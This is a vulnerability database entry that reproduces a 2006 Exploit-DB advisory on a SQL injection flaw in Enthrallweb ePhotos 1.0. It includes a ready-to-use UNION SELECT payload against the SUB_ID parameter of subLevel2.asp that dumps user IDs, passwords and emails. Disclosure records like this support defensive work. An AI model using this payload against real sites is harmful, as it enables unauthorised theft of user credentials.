Enthrallweb ePhotos 1.0 (subLevel2.asp) Remote SQL Injection Vulnerability

vendor:

ePhotos

by:

ajann

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ePhotos

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:enthrallweb:ephotos:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Enthrallweb ePhotos 1.0 (subLevel2.asp) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Enthrallweb ePhotos 1.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to the underlying database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the affected parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the underlying database.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Enthrallweb ePhotos 1.0 (subLevel2.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40 USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//subLevel2.asp?Cat_ID=33&SUB_ID=[SQL]

Example:

//subLevel2.asp?Cat_ID=33&SUB_ID=-1%20union%20select%20U_ID,U_PASSWORD,0,0,0,U_email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-23]